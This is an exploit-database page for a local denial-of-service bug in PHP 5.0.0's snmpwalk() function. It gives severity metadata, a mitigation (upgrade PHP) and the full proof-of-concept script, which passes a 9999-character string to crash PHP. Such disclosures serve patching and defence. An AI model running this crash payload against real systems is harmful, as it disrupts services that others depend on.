header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 5.0.0
Affected Version To: 5.0.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:php:php:5.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2016

PHP 5.0.0 snmpwalk() Local Denial of Service

This exploit causes a denial of service in PHP 5.0.0 when the snmpwalk() function is used with a string of 9999 'A' characters. This exploit has been tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0.

Mitigation:

Upgrade to a version of PHP that is not vulnerable to this exploit.
Source

Exploit-DB raw data:

<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>

Navigation

Suggest Exploit

Services By CQR